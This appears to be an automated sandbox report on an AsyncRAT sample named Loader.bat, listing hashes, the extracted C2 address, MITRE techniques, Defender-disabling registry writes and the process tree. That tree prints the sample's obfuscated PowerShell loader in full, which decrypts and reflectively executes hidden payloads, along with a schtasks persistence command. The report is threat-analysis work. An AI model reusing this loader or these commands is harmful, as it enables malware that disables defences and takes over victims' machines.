asyncrat | 0af4119b3a1eded45cb97a0ef9b022505470d0987cedd5bf1af0ac8c8efb322e

Analysis

max time kernel
150s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28-11-2024 19:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Loader.bat
Size

919KB
MD5

0563db3c877e66a892a597fdcf52ab47
SHA1

6d29695797709cf741081ec8d60e57230c0bf612
SHA256

0af4119b3a1eded45cb97a0ef9b022505470d0987cedd5bf1af0ac8c8efb322e
SHA512

a3e3227d410543602cc3245a061304257fa3be6ea256776bb934a226f4e2cf2fd148de257766e546e5b6a99b98a98526e12dc15acd963c997e37e52a7feaf96e
SSDEEP

24576:RKgJjCEe4LWZywOUpRWwjxyLscvANgDP7bB:sgle4QWsyYSl

Score

10^/10

asyncrat default discovery evasion execution rat trojan

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

66.66.146.74:9511

Mutex

nwJFeGdDXcL2

Attributes

delay
3
install
true
install_file
System32.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Modifies Windows Defender Real-time Protection settings 3 TTPs 12 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	winDefKiller.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	winDefKiller.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	winDefKiller.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	winDefKiller.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	winDefKiller.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	winDefKiller.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	winDefKiller.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	winDefKiller.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	winDefKiller.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	winDefKiller.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	winDefKiller.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	winDefKiller.exe

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/files/0x0007000000023ccc-32.dat	family_asyncrat

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	ddas.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	XBinderOutput.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Start.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	sa.exe

Executes dropped EXE 7 IoCs

pid	Process
948	sa.exe
2072	Start.exe
1840	ddas.exe
3132	XBinderOutput.exe
688	winDefKiller.exe
2604	winDefKiller.exe
3468	System32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4072	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	System32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Start.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1652	timeout.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1800	schtasks.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
4072	powershell.exe
4072	powershell.exe
2072	Start.exe
2072	Start.exe
2072	Start.exe
2072	Start.exe
2072	Start.exe
2072	Start.exe
2072	Start.exe
2072	Start.exe
2072	Start.exe
2072	Start.exe
2072	Start.exe
2072	Start.exe
2072	Start.exe
2072	Start.exe
2072	Start.exe
2072	Start.exe
2072	Start.exe
2072	Start.exe
2072	Start.exe
2072	Start.exe
2072	Start.exe
2072	Start.exe
2072	Start.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4072	powershell.exe
Token: SeDebugPrivilege	2072	Start.exe
Token: SeDebugPrivilege	3468	System32.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 1560 wrote to memory of 4072	1560	cmd.exe	83
PID 1560 wrote to memory of 4072	1560	cmd.exe	83
PID 4072 wrote to memory of 948	4072	powershell.exe	88
PID 4072 wrote to memory of 948	4072	powershell.exe	88
PID 4072 wrote to memory of 2072	4072	powershell.exe	89
PID 4072 wrote to memory of 2072	4072	powershell.exe	89
PID 4072 wrote to memory of 2072	4072	powershell.exe	89
PID 948 wrote to memory of 1840	948	sa.exe	91
PID 948 wrote to memory of 1840	948	sa.exe	91
PID 948 wrote to memory of 3132	948	sa.exe	92
PID 948 wrote to memory of 3132	948	sa.exe	92
PID 1840 wrote to memory of 688	1840	ddas.exe	94
PID 1840 wrote to memory of 688	1840	ddas.exe	94
PID 3132 wrote to memory of 2604	3132	XBinderOutput.exe	97
PID 3132 wrote to memory of 2604	3132	XBinderOutput.exe	97
PID 2072 wrote to memory of 2784	2072	Start.exe	99
PID 2072 wrote to memory of 2784	2072	Start.exe	99
PID 2072 wrote to memory of 2784	2072	Start.exe	99
PID 2072 wrote to memory of 744	2072	Start.exe	101
PID 2072 wrote to memory of 744	2072	Start.exe	101
PID 2072 wrote to memory of 744	2072	Start.exe	101
PID 744 wrote to memory of 1652	744	cmd.exe	103
PID 744 wrote to memory of 1652	744	cmd.exe	103
PID 744 wrote to memory of 1652	744	cmd.exe	103
PID 2784 wrote to memory of 1800	2784	cmd.exe	104
PID 2784 wrote to memory of 1800	2784	cmd.exe	104
PID 2784 wrote to memory of 1800	2784	cmd.exe	104
PID 744 wrote to memory of 3468	744	cmd.exe	105
PID 744 wrote to memory of 3468	744	cmd.exe	105
PID 744 wrote to memory of 3468	744	cmd.exe	105

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1560
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bvIV9xmfGsAMQjk2GZ+mu75BliblCnV50HBCLug3GZI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wG4bwKUNwLEOHlh+OUY6hw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $CLCMN=New-Object System.IO.MemoryStream(,$param_var); $pAUnj=New-Object System.IO.MemoryStream; $eoTaK=New-Object System.IO.Compression.GZipStream($CLCMN, [IO.Compression.CompressionMode]::Decompress); $eoTaK.CopyTo($pAUnj); $eoTaK.Dispose(); $CLCMN.Dispose(); $pAUnj.Dispose(); $pAUnj.ToArray();}function execute_function($param_var,$param2_var){ $UzjPE=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rcIWS=$UzjPE.EntryPoint; $rcIWS.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Loader.bat';$ujaGE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Loader.bat').Split([Environment]::NewLine);foreach ($pudhF in $ujaGE) { if ($pudhF.StartsWith(':: ')) { $RMQoK=$pudhF.Substring(3); break; }}$payloads_var=[string[]]$RMQoK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4072
- - C:\Users\Admin\AppData\Local\Temp\sa.exe
    "C:\Users\Admin\AppData\Local\Temp\sa.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:948
  - - C:\Users\Admin\AppData\Local\Temp\ddas.exe
      "C:\Users\Admin\AppData\Local\Temp\ddas.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1840
    - - C:\Users\Admin\AppData\Local\Temp\winDefKiller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\winDefKiller.exe"
        5⤵
        Modifies Windows Defender Real-time Protection settings
        Executes dropped EXE
        
        PID:688
  - - C:\Users\Admin\AppData\Local\Temp\XBinderOutput.exe
      "C:\Users\Admin\AppData\Local\Temp\XBinderOutput.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3132
    - - C:\Users\Admin\AppData\Local\Temp\winDefKiller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\winDefKiller.exe"
        5⤵
        Modifies Windows Defender Real-time Protection settings
        Executes dropped EXE
        
        PID:2604
- - C:\Users\Admin\AppData\Local\Temp\Start.exe
    "C:\Users\Admin\AppData\Local\Temp\Start.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2072
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System32" /tr '"C:\Users\Admin\AppData\Roaming\System32.exe"' & exit
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2784
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "System32" /tr '"C:\Users\Admin\AppData\Roaming\System32.exe"'
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1800
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE7C0.tmp.bat""
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:744
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:1652
    - - C:\Users\Admin\AppData\Roaming\System32.exe
        
        "C:\Users\Admin\AppData\Roaming\System32.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3468

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Start.exe

Filesize
45KB

MD5
b733e729705bf66c1e5c66d97e247701

SHA1
25eec814abdf1fc6afe621e16aa89c4eb42616b9

SHA256
9081f9cf986ed111d976a07ee26fc2b1b9992301344197d6d3f83fe0d2616023

SHA512
09b59b8942c1409a03ca4e7f77c6007160af4d557386b766516dba392750869c017d0fd5d6fbbfcbb3e559a70ad42adcb498595df186be180cfc04e921d74320

Download Submit
C:\Users\Admin\AppData\Local\Temp\XBinderOutput.exe

Filesize
322KB

MD5
98295714f089f4770b6694a3d7dad576

SHA1
20ea33349b30cbf6924b0b6cebf86108906bfa04

SHA256
f7dbccc1f2e1f29644a236fe6bc615b67c37b2cbd2e14c0b92e09eb3556f90b6

SHA512
4712966205327fa122f63cce7d68a1b6289bca403a249ba7061a4c1018a868f4394ddb70627836fc600500dc90f205476121c1db30d32e2fa0e24e45cd7fe83f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tsx2yp3d.3pp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ddas.exe

Filesize
319KB

MD5
934ccfa6b8ff694e4dac9316f72dd519

SHA1
1de2458399fc36726806719c31454c053f5302e2

SHA256
b38f74cbae0da373708a78367c45000813dbe2a75416ae61c812d8cafce2d1e9

SHA512
2a2f5cddff38ebffeba24b61dfd32d96396d35ee0d373e517827e3a9cf7a7e23f792a1c50ebff62c58e363d87748ca3a1a5751a555e04ae83dd80e1b5074f77e

Download Submit
C:\Users\Admin\AppData\Local\Temp\sa.exe

Filesize
643KB

MD5
a7da6606e77ba117c9faf0a02d3a80b9

SHA1
271a1f743b26dadc2d4e0b2e90cf994577ab45fe

SHA256
8496d9cb7570969ee4d5fbad0f645defde54edf75675b4407c8c803d5a296053

SHA512
c2a7ccc8bb9a13f630171ebb2a5a46dcd586a51384dd34c0496194aeee51aedb20a0929ab7d99f6b6ee53b3aefdecc47b5eccb10b25212b3ab91b5c8607c398c

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpE7C0.tmp.bat

Filesize
152B

MD5
6492b0502dbe6b2377bae7585348c756

SHA1
3bf9d111f09edcd6e6f962c60fe1f1afe8c89a9e

SHA256
18b9ac4b23812cbaa299ac39de226af642939f8770ff8c429838f72244ea49b8

SHA512
24e4a679f2f2b644c8e956d9c2fd13491249538975104786afe38fa6ebc1777ddb5f193b146a2445bdc9507a0fa427208954929d9bde150e128e2e54cadf9d83

Download Submit
C:\Users\Admin\AppData\Local\Temp\winDefKiller.exe

Filesize
909KB

MD5
cb0f3f61cf776a52d3336eafe5af7c38

SHA1
a2596b80e2b2d43245878b30697b785195072d73

SHA256
679068101335645ece8232b4715d98b1d4fddf5c04ac262133a4bbb3b053ee5f

SHA512
a7ef26fecfb73bc26c5ed81fb7d7a6b10d829cdfa1b3976713043a74a173e9ab6ce399980ceb4284200b74b9b28d7ff520eb392109ebc13a3bad18023b64bc55

Download Submit
memory/688-95-0x00007FF682B30000-0x00007FF682C19000-memory.dmp

Filesize
932KB

Download
memory/948-30-0x0000000000160000-0x0000000000208000-memory.dmp

Filesize
672KB

Download
memory/948-37-0x00007FFD67A30000-0x00007FFD684F1000-memory.dmp

Filesize
10.8MB

Download
memory/948-69-0x00007FFD67A30000-0x00007FFD684F1000-memory.dmp

Filesize
10.8MB

Download
memory/1840-68-0x0000000000850000-0x00000000008A6000-memory.dmp

Filesize
344KB

Download
memory/2072-82-0x00000000053D0000-0x000000000546C000-memory.dmp

Filesize
624KB

Download
memory/2072-43-0x00000000745EE000-0x00000000745EF000-memory.dmp

Filesize
4KB

Download
memory/2072-44-0x0000000000AA0000-0x0000000000AB2000-memory.dmp

Filesize
72KB

Download
memory/2604-96-0x00007FF682B30000-0x00007FF682C19000-memory.dmp

Filesize
932KB

Download
memory/3132-70-0x00000000009D0000-0x0000000000A26000-memory.dmp

Filesize
344KB

Download
memory/3468-93-0x00000000056A0000-0x0000000005C44000-memory.dmp

Filesize
5.6MB

Download
memory/3468-94-0x00000000051B0000-0x0000000005216000-memory.dmp

Filesize
408KB

Download
memory/4072-14-0x000001F86FC90000-0x000001F86FD3E000-memory.dmp

Filesize
696KB

Download
memory/4072-41-0x00007FFD67A30000-0x00007FFD684F1000-memory.dmp

Filesize
10.8MB

Download
memory/4072-15-0x000001F86FDE0000-0x000001F86FE8E000-memory.dmp

Filesize
696KB

Download
memory/4072-0-0x00007FFD67A33000-0x00007FFD67A35000-memory.dmp

Filesize
8KB

Download
memory/4072-13-0x000001F86FC80000-0x000001F86FC88000-memory.dmp

Filesize
32KB

Download
memory/4072-12-0x00007FFD67A30000-0x00007FFD684F1000-memory.dmp

Filesize
10.8MB

Download
memory/4072-11-0x00007FFD67A30000-0x00007FFD684F1000-memory.dmp

Filesize
10.8MB

Download
memory/4072-6-0x000001F86FA50000-0x000001F86FA72000-memory.dmp

Filesize
136KB

Download